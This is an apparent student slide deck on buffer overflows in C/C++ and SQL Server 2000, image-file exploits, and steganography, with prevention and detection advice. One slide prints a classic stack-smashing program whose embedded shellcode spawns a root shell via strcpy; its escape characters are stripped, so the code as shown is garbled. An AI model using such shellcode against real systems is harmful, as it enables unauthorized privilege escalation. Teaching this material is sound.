Buffer Overflow: A Short Study


Published on

  • Be the first to comment

  • Be the first to like this

Buffer Overflow: A Short Study

  1. 1. Buffer overflow: a short study<br />Jonathan Hutchison<br />Robert Lee<br />Connor Mahoney<br />Caleb Wherry<br />
  2. 2. Overview<br /><ul><li>Buffer Overflows
  3. 3. C/C++
  4. 4. SQL
  5. 5. Images
  6. 6. Steganogrophy
  7. 7. Traditional
  8. 8. Digital</li></li></ul><li>Basic Concepts<br />Buffer<br />Stack Memory<br />Heap Memory<br />Buffer Overflow<br />C/C++<br />SQL<br />Steganogrophy<br />
  9. 9. C/C++ Buffer Overflow Vulnerabilities<br />C/C++ On Older Linux Machines<br />Easiest to exploit.<br />Few protections against segmentation faults.<br />Many simple programs can cause serious damage on these machines.<br />Code Libraries<br />Not trusted libraries.<br />Unstable functions.<br /> Unsecured error checking.<br />
  10. 10. C/C++ Buffer Overflow Vulnerabilities (cont.)<br />Exploitation Using Shell Code<br />Shell Code<br />Unstable C commands<br />C Example:<br />Use of shell code to switch the user to “root”<br />Use of “strcpy()” function in C to cause a buffer overflow.<br />Dangerous for someone running an unsecured Linux machine.<br />
  11. 11. #include <stdio.h><br />#include <string.h><br />char shellcode[] =<br /> "xebx1fx5ex89x76x08x31xc0x88x46x07x89x46x0cxb0x0b"<br /> "x89xf3x8dx4ex08x8dx56x0cxcdx80x31xdbx89xd8x40xcd"<br /> "x80xe8xdcxffxffxff/bin/sh"; // Shell code that will be executed once the buffer is // over flown. It allows us to change the stance of our // login to “root”.<br />char large_string[128];<br />int main(int argc, char *argv[]) <br />{<br /> char buffer[96]; // buffer to overflow<br /> int i;<br /> long *long_ptr = (long *)large_string;<br /> <br />for (i = 0; i < 32; i++) // These for loops take the shell code and // translate it into the large string and then // in turn puts a full buffer into each // pointer value of the large_string <br /> *(long_ptr + i) = (int)buffer;<br />for (i = 0; i < (int)strlen(shellcode); i++)<br /> large_string[i] = shellcode[i];<br /> strcpy(buffer, large_string); // The string copy function in C should be used // with the utmost caution. This is where the code // blows up and causes the program to execute the // rest of the shell code on the command line. <br /> return 0;<br />}<br />
  12. 12. Prevention of Buffer Overflow In C/C++ <br />Use only trusted libraries when writing code.<br />Use updated software that helps prevent overflow.<br />Make sure your code checks the user input.<br />Use trusted programs, don’t use untested software.<br />
  13. 13. Prevention of Buffer Overflow In C/C++ (cont.)<br />Administrative Point of View<br />Don’t compromise quality for quantity.<br />Don’t rush deadlines.<br />Make sure your programmers are happy and comfortable. Working conditions matter.<br />Error checking for all inputs is a must.<br />Don’t cut corners.<br />Use software such as Flawfinder and Viega’s RATS for possible code problems.<br />
  14. 14. Buffer Overflow In SQL<br />SQL – Structured Query Language<br />Popular query language for relational database management.<br />In 2002, a Buffer Overflow vulnerability was discovered in Microsoft SQL Server 2000. <br />Both Stack based and Heap based attacks.<br />Attacks carried out through UDP port 1434<br /> SQL Monitor Port<br />Commonly used by legitimate clients attempting to connect.<br />Single byte packet, set to 0x02<br />
  15. 15. Stack Based Buffer Overflow Attack<br />First byte set to 0x04<br />Instructs SQL monitor to open registry key<br />If followed by a large number of bytes, stack based buffer is overflowed.<br />Return address overwritten<br />Redirects SQL server process to execute code of attackers choice.<br />
  16. 16. Heap Based Buffer Overflow Attack<br />Carried out using similar technique<br />First byte set to 0x08 followed by a message with a certain format.<br />Formatted properly, attack avoids access violation errors before heap is overflowed.<br />Vulnerability in SQL server 2000 code<br />Return values not validated<br />Unhandled exceptions<br />Current process fails, resulting effectively in a denial of service attack.<br />
  17. 17. Buffer Overflow In Images<br />iPhone<br />www.jailbreakme.com<br />Alter file header in TIFF image<br />New memory pointer<br />Crashes browser<br />Unlocks file system<br />
  18. 18. Other exploits<br />Windows<br />JPEG (GDI+ API)<br />BMP<br />GIF<br />Linux<br />PNG<br />Macintosh, iPhone, & PSP<br />TIFF<br />
  19. 19. Traditional Stegenogrophy<br />Image from a laser printer under 10x magnification<br />
  20. 20. Traditional Steganogrophy (cont) <br />
  21. 21. Digital Steganogrophy<br />How it works<br />Each pixel has 24 bits for 3 colors (255 shades/color)<br />Change 1 or 2 color bits every pixel<br />Adds up quickly<br />Bits can be encoded & decoded with a program<br />No quality or size difference<br />Images<br />Video<br />Audio<br />
  22. 22. Detection and Prevention<br />Compare with an original by checksum<br />Check same color pixels for different values<br />Statistical analysis<br />Algorithm detection<br />Compression & formatting<br />
  23. 23. Example<br />Hidden image<br />Original image<br />